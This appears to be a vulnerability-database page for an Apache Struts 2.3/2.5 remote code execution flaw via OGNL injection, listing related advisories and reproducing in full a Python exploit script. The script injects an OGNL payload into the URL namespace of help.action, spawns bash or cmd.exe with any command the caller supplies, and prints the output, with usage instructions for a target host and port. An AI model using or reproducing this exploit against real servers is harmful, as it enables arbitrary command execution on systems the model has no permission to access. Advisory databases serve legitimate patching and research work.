Lucene search
Apache Struts 2.3 / 2.5 Remote Code Execution
Apache Struts remote code execution via OGNL injectio
Show more
| Reporter | Title | Published | Views | Family All 102 |
|---|---|---|---|---|
 | Apache Struts 2 Namespace Redirect OGNL Injection | 7 Sep 201800:00 | – | packetstorm |
| Apache Struts 2.3 / 2.5 Remote Code Execution | 26 Aug 201800:00 | – | packetstorm |
 | Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit | 28 Aug 201800:00 | – | zdt |
| Apache Struts 2 Namespace Redirect OGNL Injection Exploit | 8 Sep 201800:00 | – | zdt |
| Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit | 28 Aug 201800:00 | – | zdt |
| Apache Struts 2.x Remote Code Execution Vulnerability | 24 Aug 201800:00 | – | zdt |
 | Slack Plugs Token Security Hole | 30 Apr 201607:25 | – | threatpost |
| Army Research Lab Releases Dshell Forensics Framework | 30 Jan 201510:59 | – | threatpost |
| Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug | 3 Jun 201507:37 | – | threatpost |
| GitHub Code Execution Bug Fetches $18,000 Bounty | 17 Mar 201709:00 | – | threatpost |
10
`#!/usr/bin/python
# -*- coding: utf-8 -*-
# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
import sys
import urllib
import urllib2
import httplib
def exploit(host,cmd):
print "[Execute]: {}".format(cmd)
ognl_payload = "${"
ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"
if not ":" in host:
host = "{}:8080".format(host)
# encode the payload
ognl_payload_encoded = urllib.quote_plus(ognl_payload)
# further encoding
url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))
print "[Url]: {}\n\n\n".format(url)
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response
if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo25 Aug 2018 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.94429